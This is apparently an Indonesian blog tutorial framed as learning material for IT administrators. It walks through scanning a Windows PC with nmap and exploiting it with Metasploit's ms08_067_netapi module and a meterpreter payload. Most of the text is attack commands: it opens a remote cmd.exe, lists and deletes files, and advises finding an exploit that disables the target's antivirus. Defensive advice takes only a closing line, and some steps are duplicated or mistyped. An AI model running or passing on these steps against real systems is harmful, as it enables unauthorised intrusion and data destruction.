Artikel ini dimaksudkan untuk pembelajaran.
Jangan digunakan untuk kegiatan yang melanggar hukum.
Sebagai seorang IT Administrator,
tentunya memerlukan banyak tools untuk memastikan bahwa system yang dimanage aman.
Dan sebagaimana yang saya sampaikan pada tulisan saya sebelumnya bahwa langkah
terbaik untuk menjaga keamanan dan stabilitas system/network adalah dengan
mengetahui jenis-jenis serangan yang biasa dilakukan oleh para craker.
Pada artikel kali ini saya akan sharing mengenai hacking dengan menggunakan Metasploit. Metasploit adalah salah satu tools yang tersedia pada Linux BackTrack (Backtrack adalah OS yang biasa digunakan para hacker).
Dengan menggunakan Metasploit, seorang craker bisa masuk ke DOS windows, melihat-lihat isi hardisk bahkan bisa menghapus folder windows tersebut.
Hal-hal yang harus disiapkan adalah :
- 1. Satu buah PC atauNotebook dengan OS BackTrack atau jika kebetulan menggunakan Linux Ubuntu maka terpaksa harus menginstall terlebih dahulu tools Backtrack pada Ubuntu (Cara install BackTrack pada Ubuntu akan saya sampaikan dalam artikel yang berbeda.
- PC dengan OS WindowsKedua PC tersebut di atas harus terhubung dengan LAN.
Selanjutnya lakukan langkah-langkah
berikut :
- Buka terminal/console
- Ketikkan
nmap kemudian tekan enter$>
nmap ip-target enter (ganti ip-target dengan ip number dari target PC
Kemudian akan muncul gambar seperti di bawah ini.
Dari gambar di atas terlihat bahwa
Port 135 di windows dari PC target statusnya Open, dan itu pertanda awal yang
bagus.
3. Ketikkan msfconsole kemudian tekan enter
$> msfconsole enter
3. Ketikkan msfconsole kemudian tekan enter
$> msfconsole enter
4. Ketikkan perintah berikut :
$> use windows/smb/ms08_067_netapi (enter)
$> set payloads
windows/meterpreter/bind_tcp (enter)
$> set lhost 192.168.0.1 (enter, IP PC
penyerang)
$> set rhost 192.168.0.2 (enter, IP PC
target)
$> exploit (enter)
5. Jika setelah mengetikkan baris perintah diatas, muncul pesan seperti ini “Exploit completed, but no session was created”, berarti antivirus dari komputer target bekerja dengan baik. Carilah exploit yang bisa mematikan antivirus.
6. Jika yang muncul adalah
$> meterpreter berarti sukses.
7. Lanjutkan dengan mengetikkan perintah berikut ini
7. Lanjutkan dengan mengetikkan perintah berikut ini
$> execute –f cmd.exe –c -i
Coba ketikkan perintah DIR untuk
melihat file dan folder-folder di windows. Untuk menghapus tinggak ketikkan DEL
<nama file>
Terakhir, jika serangan exploit yang dilakukan di atas berhasil maka segera patch/update windowsnya serta update antivirusnya. Jangan lupa gunakan Antivirus yang bagus.
Terakhir, jika serangan exploit yang dilakukan di atas berhasil maka segera patch/update windowsnya serta update antivirusnya. Jangan lupa gunakan Antivirus yang bagus.
Modul-modul exploit yang menggunakan
metasploit bisa dipelajari pada link berikut : http://www.offensive-security.com/metasploit-unleashed/